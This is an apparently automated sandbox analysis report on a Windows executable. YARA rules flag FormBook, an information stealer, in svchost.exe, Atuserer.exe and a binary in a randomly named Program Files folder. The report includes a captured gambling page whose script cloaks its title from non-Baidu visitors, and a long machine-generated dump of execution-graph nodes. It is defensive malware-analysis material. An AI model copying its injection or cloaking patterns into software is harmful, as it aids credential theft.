                                                        Data Raw: 37 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 34 35 3b 26 23 36 35 3b 26 23 38 30 3b 26 23 38 30 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 [TRUNCATED]
                                                        Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&# [TRUNCATED]
                                                        Nov 7, 2024 15:52:27.157059908 CET | 778 | IN | Data Raw: 32 34 34 37 3b 26 23 32 30 30 32 36 3b 26 23 32 34 37 34 34 3b 26 23 32 36 33 38 31 3b 26 23 32 31 31 35 33 3b 26 23 33 33 3b 22 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f
                                                        Data Ascii: 2447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><script type="text/jav


                                                        Target ID:2
                                                        Start time:09:49:22
                                                        Start date:07/11/2024
                                                        Path:C:\Users\user\Desktop\RO2Y11yOJ7.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                                                        Imagebase:0x340000
                                                        File size:1'324'032 bytes
                                                        MD5 hash:5FFE1BA845FB6E48AAE4367EF675444E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:09:49:23
                                                        Start date:07/11/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                                                        Imagebase:0x5f0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:09:49:53
                                                        Start date:07/11/2024
                                                        Path:C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe"
                                                        Imagebase:0x940000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:09:49:55
                                                        Start date:07/11/2024
                                                        Path:C:\Windows\SysWOW64\Atuserer.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\Atuserer.exe"
                                                        Imagebase:0xf20000
                                                        File size:68'608 bytes
                                                        MD5 hash:D5B61959A509BDA85300781F5A829610
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:09:50:08
                                                        Start date:07/11/2024
                                                        Path:C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe"
                                                        Imagebase:0x940000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:09:50:26
                                                        Start date:07/11/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff613480000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:3.4%
                                                          Dynamic/Decrypted Code Coverage:0.9%
                                                          Signature Coverage:7.4%
                                                          Total number of Nodes:1961
                                                          Total number of Limit Nodes:164
                                                          execution_graph: [node/edge listing of the interactive execution graph widget omitted; it renders only as a graph in the original report]
97606->97528 97608 369d8b __lock 58 API calls 97607->97608 97609 3634f7 DecodePointer EncodePointer 97608->97609 97672 369ef5 LeaveCriticalSection 97609->97672 97611 3449a7 97612 363554 97611->97612 97613 36355e 97612->97613 97614 363578 97612->97614 97613->97614 97673 368ca8 58 API calls __getptd_noexit 97613->97673 97614->97537 97616 363568 97674 368f36 9 API calls __filbuf 97616->97674 97618 363573 97618->97537 97619->97539 97621 343b59 __write_nolock 97620->97621 97622 3477c7 59 API calls 97621->97622 97623 343b63 GetCurrentDirectoryW 97622->97623 97675 343778 97623->97675 97625 343b8c IsDebuggerPresent 97626 37d3dd MessageBoxA 97625->97626 97627 343b9a 97625->97627 97630 37d3f7 97626->97630 97628 343c73 97627->97628 97627->97630 97631 343bb7 97627->97631 97629 343c7a SetCurrentDirectoryW 97628->97629 97634 343c87 Mailbox 97629->97634 97875 347373 59 API calls Mailbox 97630->97875 97756 3473e5 97631->97756 97634->97541 97635 37d407 97640 37d41d SetCurrentDirectoryW 97635->97640 97637 343bd5 GetFullPathNameW 97638 347d2c 59 API calls 97637->97638 97639 343c10 97638->97639 97772 350a8d 97639->97772 97640->97634 97643 343c2e 97644 343c38 97643->97644 97876 3a4a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 97643->97876 97788 343a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97644->97788 97648 37d43a 97648->97644 97651 37d44b 97648->97651 97650 343c42 97653 343c55 97650->97653 97873 3443db 68 API calls _memset 97650->97873 97877 344864 97651->97877 97796 350b30 97653->97796 97654 37d453 97657 347f41 59 API calls 97654->97657 97659 37d460 97657->97659 97658 343c60 97658->97628 97874 3444cb Shell_NotifyIconW _memset 97658->97874 97660 37d48f 97659->97660 97661 37d46a 97659->97661 97664 347e0b 59 API calls 97660->97664 97884 347e0b 97661->97884 97666 37d48b GetForegroundWindow ShellExecuteW 97664->97666 97670 37d4bf Mailbox 97666->97670 97667 347c8e 59 API calls 97669 37d482 97667->97669 97671 347e0b 59 API calls 97669->97671 97670->97628 
97671->97666 97672->97611 97673->97616 97674->97618 97676 3477c7 59 API calls 97675->97676 97677 34378e 97676->97677 97891 343d43 97677->97891 97679 3437ac 97680 344864 61 API calls 97679->97680 97681 3437c0 97680->97681 97682 347f41 59 API calls 97681->97682 97683 3437cd 97682->97683 97905 344f3d 97683->97905 97686 37d2de 97972 3a9604 97686->97972 97687 3437ee Mailbox 97691 3481a7 59 API calls 97687->97691 97690 37d2fd 97693 362ed5 _free 58 API calls 97690->97693 97694 343801 97691->97694 97695 37d30a 97693->97695 97929 3493ea 97694->97929 97697 344faa 84 API calls 97695->97697 97699 37d313 97697->97699 97703 343ee2 59 API calls 97699->97703 97700 347f41 59 API calls 97701 34381a 97700->97701 97932 348620 97701->97932 97705 37d32e 97703->97705 97704 34382c Mailbox 97706 347f41 59 API calls 97704->97706 97707 343ee2 59 API calls 97705->97707 97708 343852 97706->97708 97709 37d34a 97707->97709 97710 348620 69 API calls 97708->97710 97711 344864 61 API calls 97709->97711 97713 343861 Mailbox 97710->97713 97712 37d36f 97711->97712 97714 343ee2 59 API calls 97712->97714 97716 3477c7 59 API calls 97713->97716 97715 37d37b 97714->97715 97717 3481a7 59 API calls 97715->97717 97718 34387f 97716->97718 97719 37d389 97717->97719 97936 343ee2 97718->97936 97721 343ee2 59 API calls 97719->97721 97723 37d398 97721->97723 97729 3481a7 59 API calls 97723->97729 97725 343899 97725->97699 97726 3438a3 97725->97726 97727 36307d _W_store_winword 60 API calls 97726->97727 97728 3438ae 97727->97728 97728->97705 97730 3438b8 97728->97730 97731 37d3ba 97729->97731 97732 36307d _W_store_winword 60 API calls 97730->97732 97733 343ee2 59 API calls 97731->97733 97734 3438c3 97732->97734 97735 37d3c7 97733->97735 97734->97709 97736 3438cd 97734->97736 97735->97735 97737 36307d _W_store_winword 60 API calls 97736->97737 97738 3438d8 97737->97738 97738->97723 97739 343919 97738->97739 97741 343ee2 59 API calls 97738->97741 97739->97723 97740 343926 97739->97740 97952 34942e 97740->97952 97743 
3438fc 97741->97743 97745 3481a7 59 API calls 97743->97745 97747 34390a 97745->97747 97749 343ee2 59 API calls 97747->97749 97749->97739 97751 3493ea 59 API calls 97753 343961 97751->97753 97752 349040 60 API calls 97752->97753 97753->97751 97753->97752 97754 343ee2 59 API calls 97753->97754 97755 3439a7 Mailbox 97753->97755 97754->97753 97755->97625 97757 3473f2 __write_nolock 97756->97757 97758 37ed7b _memset 97757->97758 97759 34740b 97757->97759 97762 37ed97 GetOpenFileNameW 97758->97762 98600 3448ae 97759->98600 97763 37ede6 97762->97763 97765 347d2c 59 API calls 97763->97765 97767 37edfb 97765->97767 97767->97767 97769 347429 98628 3469ca 97769->98628 97773 350a9a __write_nolock 97772->97773 98892 346ee0 97773->98892 97775 350a9f 97787 343c26 97775->97787 98903 3512fe 90 API calls 97775->98903 97777 350aac 97777->97787 98904 354047 92 API calls Mailbox 97777->98904 97779 350ab5 97780 350ab9 GetFullPathNameW 97779->97780 97779->97787 97781 347d2c 59 API calls 97780->97781 97782 350ae5 97781->97782 97783 347d2c 59 API calls 97782->97783 97784 350af2 97783->97784 97785 385004 _wcscat 97784->97785 97786 347d2c 59 API calls 97784->97786 97786->97787 97787->97635 97787->97643 97789 343ac2 LoadImageW RegisterClassExW 97788->97789 97790 37d3cc 97788->97790 98907 343041 7 API calls 97789->98907 98908 3448fe LoadImageW EnumResourceNamesW 97790->98908 97793 343b46 97795 3439e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97793->97795 97794 37d3d5 97795->97650 97797 38501c 97796->97797 97809 350b55 97796->97809 98964 3a9ed4 90 API calls 4 library calls 97797->98964 97799 350e5a 97799->97658 97802 351044 97802->97799 97804 351051 97802->97804 97803 350bab PeekMessageW 97872 350b65 Mailbox 97803->97872 98962 3511f3 342 API calls Mailbox 97804->98962 97807 351058 LockWindowUpdate DestroyWindow GetMessageW 97807->97799 97811 35108a 97807->97811 97808 350e44 97808->97799 98961 3511d0 10 API calls Mailbox 97808->98961 97809->97872 98965 349fbd 60 API calls 
97809->98965 98966 39669f 342 API calls 97809->98966 97810 3851da Sleep 97810->97872 97812 385fb1 TranslateMessage DispatchMessageW GetMessageW 97811->97812 97812->97812 97814 385fe1 97812->97814 97814->97799 97815 3850a9 TranslateAcceleratorW 97818 350fa3 PeekMessageW 97815->97818 97815->97872 97816 349fbd 60 API calls 97816->97872 97817 351005 TranslateMessage DispatchMessageW 97817->97818 97818->97872 97819 385b78 WaitForSingleObject 97822 385b95 GetExitCodeProcess CloseHandle 97819->97822 97819->97872 97821 350e73 timeGetTime 97821->97872 97855 3510f5 97822->97855 97823 350fbf Sleep 97856 350fd0 Mailbox 97823->97856 97824 3481a7 59 API calls 97824->97872 97825 3477c7 59 API calls 97825->97856 97826 385e51 Sleep 97826->97856 97828 360f36 59 API calls Mailbox 97828->97872 97830 36034a timeGetTime 97830->97856 97831 3510ae timeGetTime 98963 349fbd 60 API calls 97831->98963 97834 385ee8 GetExitCodeProcess 97837 385efe WaitForSingleObject 97834->97837 97838 385f14 CloseHandle 97834->97838 97835 349997 85 API calls 97835->97872 97836 34b93d 110 API calls 97836->97856 97837->97838 97837->97872 97838->97856 97841 3c5f8e 111 API calls 97841->97856 97842 385bcd 97842->97855 97843 3853d1 Sleep 97843->97872 97844 385f70 Sleep 97844->97872 97846 347f41 59 API calls 97846->97856 97855->97658 97856->97825 97856->97830 97856->97834 97856->97836 97856->97841 97856->97842 97856->97843 97856->97844 97856->97846 97856->97855 97856->97872 98973 3a2700 60 API calls 97856->98973 98974 349fbd 60 API calls 97856->98974 98975 348b13 69 API calls Mailbox 97856->98975 98976 34b89c 342 API calls 97856->98976 98977 396830 60 API calls 97856->98977 98978 3a52eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97856->98978 98979 3a3c99 66 API calls Mailbox 97856->98979 97857 3a9ed4 90 API calls 97857->97872 97859 348620 69 API calls 97859->97872 97860 349df0 59 API calls Mailbox 97860->97872 97861 34a000 315 API calls 97861->97872 97862 34b89c 315 API 
calls 97862->97872 97864 3963f2 59 API calls Mailbox 97864->97872 97865 347f41 59 API calls 97865->97872 97866 348b13 69 API calls 97866->97872 97867 38592e VariantClear 97867->97872 97868 3859c4 VariantClear 97868->97872 97869 348e34 59 API calls Mailbox 97869->97872 97870 385772 VariantClear 97870->97872 97871 3971e5 59 API calls 97871->97872 97872->97803 97872->97808 97872->97810 97872->97815 97872->97816 97872->97817 97872->97818 97872->97819 97872->97821 97872->97823 97872->97824 97872->97826 97872->97828 97872->97831 97872->97835 97872->97855 97872->97856 97872->97857 97872->97859 97872->97860 97872->97861 97872->97862 97872->97864 97872->97865 97872->97866 97872->97867 97872->97868 97872->97869 97872->97870 97872->97871 98909 34e800 97872->98909 98940 34f5c0 97872->98940 98958 34e580 342 API calls 97872->98958 98959 34fe40 342 API calls 2 library calls 97872->98959 98960 3431ce IsDialogMessageW GetClassLongW 97872->98960 98967 3c6081 59 API calls 97872->98967 98968 3a9abe 59 API calls Mailbox 97872->98968 98969 39d801 59 API calls 97872->98969 98970 396363 59 API calls 2 library calls 97872->98970 98971 348561 59 API calls 97872->98971 98972 34843f 59 API calls Mailbox 97872->98972 97873->97653 97874->97628 97875->97635 97876->97648 97878 371ac0 __write_nolock 97877->97878 97879 344871 GetModuleFileNameW 97878->97879 97880 347f41 59 API calls 97879->97880 97881 344897 97880->97881 97882 3448ae 60 API calls 97881->97882 97883 3448a1 Mailbox 97882->97883 97883->97654 97885 37f0a3 97884->97885 97886 347e1f 97884->97886 99359 348189 59 API calls Mailbox 97885->99359 99354 347db0 97886->99354 97889 347e2a 97889->97667 97890 37f0ae __wsetenvp _memmove 97892 343d50 __write_nolock 97891->97892 97893 347d2c 59 API calls 97892->97893 97904 343eb6 Mailbox 97892->97904 97895 343d82 97893->97895 97898 343db8 Mailbox 97895->97898 98013 347b52 97895->98013 97896 347b52 59 API calls 97896->97898 97897 343e89 97899 347f41 59 API calls 97897->97899 97897->97904 97898->97896 
97898->97897 97900 347f41 59 API calls 97898->97900 97898->97904 98016 343f84 97898->98016 97901 343eaa 97899->97901 97900->97898 97902 343f84 59 API calls 97901->97902 97902->97904 97904->97679 98022 344d13 97905->98022 97910 37dc3f 97913 344faa 84 API calls 97910->97913 97911 344f68 LoadLibraryExW 98032 344cc8 97911->98032 97915 37dc46 97913->97915 97917 344cc8 3 API calls 97915->97917 97918 37dc4e 97917->97918 98058 34506b 97918->98058 97919 344f8f 97919->97918 97920 344f9b 97919->97920 97922 344faa 84 API calls 97920->97922 97924 3437e6 97922->97924 97924->97686 97924->97687 97926 37dc75 98066 345027 97926->98066 97928 37dc82 97930 360f36 Mailbox 59 API calls 97929->97930 97931 34380d 97930->97931 97931->97700 97933 34862b 97932->97933 97935 348652 97933->97935 98320 348b13 69 API calls Mailbox 97933->98320 97935->97704 97937 343f05 97936->97937 97938 343eec 97936->97938 97939 347d2c 59 API calls 97937->97939 97940 3481a7 59 API calls 97938->97940 97941 34388b 97939->97941 97940->97941 97942 36307d 97941->97942 97943 3630fe 97942->97943 97944 363089 97942->97944 98323 363110 60 API calls 3 library calls 97943->98323 97951 3630ae 97944->97951 98321 368ca8 58 API calls __getptd_noexit 97944->98321 97947 36310b 97947->97725 97948 363095 98322 368f36 9 API calls __filbuf 97948->98322 97950 3630a0 97950->97725 97951->97725 97953 349436 97952->97953 97954 360f36 Mailbox 59 API calls 97953->97954 97955 349444 97954->97955 97956 343936 97955->97956 98324 34935c 59 API calls Mailbox 97955->98324 97958 3491b0 97956->97958 98325 3492c0 97958->98325 97960 3491bf 97961 360f36 Mailbox 59 API calls 97960->97961 97962 343944 97960->97962 97961->97962 97963 349040 97962->97963 97964 37f4d5 97963->97964 97970 349057 97963->97970 97964->97970 98335 348d3b 59 API calls Mailbox 97964->98335 97966 3491a0 98334 349e9c 60 API calls Mailbox 97966->98334 97967 349158 97968 360f36 Mailbox 59 API calls 97967->97968 97971 34915f 97968->97971 97970->97966 97970->97967 97970->97971 
97971->97753 97973 345045 85 API calls 97972->97973 97974 3a9673 97973->97974 98336 3a97dd 97974->98336 97977 34506b 74 API calls 97978 3a96a0 97977->97978 97979 34506b 74 API calls 97978->97979 97980 3a96b0 97979->97980 97981 34506b 74 API calls 97980->97981 97982 3a96cb 97981->97982 97983 34506b 74 API calls 97982->97983 97984 3a96e6 97983->97984 97985 345045 85 API calls 97984->97985 97986 3a96fd 97985->97986 97987 36588c _W_store_winword 58 API calls 97986->97987 97988 3a9704 97987->97988 97989 36588c _W_store_winword 58 API calls 97988->97989 97990 3a970e 97989->97990 97991 34506b 74 API calls 97990->97991 97992 3a9722 97991->97992 97993 3a91b2 GetSystemTimeAsFileTime 97992->97993 97994 3a9735 97993->97994 97995 3a974a 97994->97995 97996 3a975f 97994->97996 97999 362ed5 _free 58 API calls 97995->97999 97997 3a97c4 97996->97997 97998 3a9765 97996->97998 98001 362ed5 _free 58 API calls 97997->98001 98342 3a8baf 116 API calls __fcloseall 97998->98342 98002 3a9750 97999->98002 98004 37d2f1 98001->98004 98005 362ed5 _free 58 API calls 98002->98005 98003 3a97bc 98006 362ed5 _free 58 API calls 98003->98006 98004->97690 98007 344faa 98004->98007 98005->98004 98006->98004 98008 344fb4 98007->98008 98009 344fbb 98007->98009 98343 365516 98008->98343 98011 344fca 98009->98011 98012 344fdb FreeLibrary 98009->98012 98011->97690 98012->98011 98014 347faf 59 API calls 98013->98014 98015 347b5d 98014->98015 98015->97895 98017 343f92 98016->98017 98021 343fb4 _memmove 98016->98021 98019 360f36 Mailbox 59 API calls 98017->98019 98018 360f36 Mailbox 59 API calls 98020 343fc8 98018->98020 98019->98021 98020->97898 98021->98018 98071 344d61 98022->98071 98025 344d3a 98027 344d53 98025->98027 98028 344d4a FreeLibrary 98025->98028 98026 344d61 2 API calls 98026->98025 98029 3653cb 98027->98029 98028->98027 98075 3653e0 98029->98075 98031 344f5c 98031->97910 98031->97911 98235 344d94 98032->98235 98035 344d94 2 API calls 98038 344ced 98035->98038 98036 344cff FreeLibrary 98037 344d08 
98036->98037 98039 344dd0 98037->98039 98038->98036 98038->98037 98040 360f36 Mailbox 59 API calls 98039->98040 98041 344de5 98040->98041 98239 34538e 98041->98239 98043 344df1 _memmove 98044 344e2c 98043->98044 98046 344f21 98043->98046 98047 344ee9 98043->98047 98045 345027 69 API calls 98044->98045 98054 344e35 98045->98054 98253 3a99c4 95 API calls 98046->98253 98242 344fe9 CreateStreamOnHGlobal 98047->98242 98050 34506b 74 API calls 98050->98054 98052 344ec9 98052->97919 98053 37dc00 98055 345045 85 API calls 98053->98055 98054->98050 98054->98052 98054->98053 98248 345045 98054->98248 98056 37dc14 98055->98056 98057 34506b 74 API calls 98056->98057 98057->98052 98059 37dd26 98058->98059 98060 34507d 98058->98060 98277 365752 98060->98277 98063 3a91b2 98297 3a9008 98063->98297 98065 3a91c8 98065->97926 98067 345036 98066->98067 98068 37dce9 98066->98068 98302 365dd0 98067->98302 98070 34503e 98070->97928 98072 344d2e 98071->98072 98073 344d6a LoadLibraryA 98071->98073 98072->98025 98072->98026 98073->98072 98074 344d7b GetProcAddress 98073->98074 98074->98072 98078 3653ec __getstream 98075->98078 98076 3653ff 98124 368ca8 58 API calls __getptd_noexit 98076->98124 98078->98076 98080 365430 98078->98080 98079 365404 98125 368f36 9 API calls __filbuf 98079->98125 98094 370668 98080->98094 98083 365435 98084 36543e 98083->98084 98085 36544b 98083->98085 98126 368ca8 58 API calls __getptd_noexit 98084->98126 98087 365475 98085->98087 98088 365455 98085->98088 98109 370787 98087->98109 98127 368ca8 58 API calls __getptd_noexit 98088->98127 98091 36540f @_EH4_CallFilterFunc@8 __getstream 98091->98031 98095 370674 __getstream 98094->98095 98096 369d8b __lock 58 API calls 98095->98096 98097 370682 98096->98097 98098 3706fd 98097->98098 98103 369e13 __mtinitlocknum 58 API calls 98097->98103 98107 3706f6 98097->98107 98132 366dcd 59 API calls __lock 98097->98132 98133 366e37 LeaveCriticalSection LeaveCriticalSection _doexit 98097->98133 98134 36899d 58 API calls 2 
library calls 98098->98134 98101 370704 98101->98107 98135 369fab InitializeCriticalSectionAndSpinCount 98101->98135 98103->98097 98105 370773 __getstream 98105->98083 98106 37072a EnterCriticalSection 98106->98107 98129 37077e 98107->98129 98111 3707a7 __wopenfile 98109->98111 98110 3707c1 98140 368ca8 58 API calls __getptd_noexit 98110->98140 98111->98110 98123 37097c 98111->98123 98142 36394b 60 API calls 2 library calls 98111->98142 98113 3707c6 98141 368f36 9 API calls __filbuf 98113->98141 98115 365480 98128 3654a2 LeaveCriticalSection LeaveCriticalSection _fprintf 98115->98128 98116 3709df 98137 378721 98116->98137 98119 370975 98119->98123 98143 36394b 60 API calls 2 library calls 98119->98143 98121 370994 98121->98123 98144 36394b 60 API calls 2 library calls 98121->98144 98123->98110 98123->98116 98124->98079 98125->98091 98126->98091 98127->98091 98128->98091 98136 369ef5 LeaveCriticalSection 98129->98136 98131 370785 98131->98105 98132->98097 98133->98097 98134->98101 98135->98106 98136->98131 98145 377f05 98137->98145 98139 37873a 98139->98115 98140->98113 98141->98115 98142->98119 98143->98121 98144->98123 98146 377f11 __getstream 98145->98146 98147 377f27 98146->98147 98150 377f5d 98146->98150 98232 368ca8 58 API calls __getptd_noexit 98147->98232 98149 377f2c 98233 368f36 9 API calls __filbuf 98149->98233 98156 377fce 98150->98156 98153 377f79 98234 377fa2 LeaveCriticalSection __unlock_fhandle 98153->98234 98155 377f36 __getstream 98155->98139 98157 377fee 98156->98157 98158 36465a __wsopen_nolock 58 API calls 98157->98158 98162 37800a 98158->98162 98159 378141 98160 368f46 __invoke_watson 8 API calls 98159->98160 98161 378720 98160->98161 98163 377f05 __wsopen_helper 103 API calls 98161->98163 98162->98159 98164 378044 98162->98164 98170 378067 98162->98170 98165 37873a 98163->98165 98166 368c74 __write 58 API calls 98164->98166 98165->98153 98167 378049 98166->98167 98168 368ca8 __filbuf 58 API calls 98167->98168 98169 378056 98168->98169 98172 
368f36 __filbuf 9 API calls 98169->98172 98171 378125 98170->98171 98178 378103 98170->98178 98173 368c74 __write 58 API calls 98171->98173 98174 378060 98172->98174 98175 37812a 98173->98175 98174->98153 98176 368ca8 __filbuf 58 API calls 98175->98176 98177 378137 98176->98177 98179 368f36 __filbuf 9 API calls 98177->98179 98180 36d414 __alloc_osfhnd 61 API calls 98178->98180 98179->98159 98181 3781d1 98180->98181 98182 3781fe 98181->98182 98183 3781db 98181->98183 98184 377e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98182->98184 98185 368c74 __write 58 API calls 98183->98185 98195 378220 98184->98195 98186 3781e0 98185->98186 98188 368ca8 __filbuf 58 API calls 98186->98188 98187 37829e GetFileType 98190 3782eb 98187->98190 98191 3782a9 GetLastError 98187->98191 98189 3781ea 98188->98189 98193 368ca8 __filbuf 58 API calls 98189->98193 98202 36d6aa __set_osfhnd 59 API calls 98190->98202 98194 368c87 __dosmaperr 58 API calls 98191->98194 98192 37826c GetLastError 98196 368c87 __dosmaperr 58 API calls 98192->98196 98193->98174 98197 3782d0 CloseHandle 98194->98197 98195->98187 98195->98192 98198 377e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98195->98198 98199 378291 98196->98199 98197->98199 98200 3782de 98197->98200 98201 378261 98198->98201 98203 368ca8 __filbuf 58 API calls 98199->98203 98204 368ca8 __filbuf 58 API calls 98200->98204 98201->98187 98201->98192 98207 378309 98202->98207 98203->98159 98205 3782e3 98204->98205 98205->98199 98206 3784c4 98206->98159 98209 378697 CloseHandle 98206->98209 98207->98206 98208 371a41 __lseeki64_nolock 60 API calls 98207->98208 98222 37838a 98207->98222 98210 378373 98208->98210 98211 377e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98209->98211 98213 368c74 __write 58 API calls 98210->98213 98216 378392 98210->98216 98212 3786be 98211->98212 98214 3786c6 GetLastError 98212->98214 98223 37854e 98212->98223 98213->98222 98215 368c87 __dosmaperr 58 API calls 98214->98215 
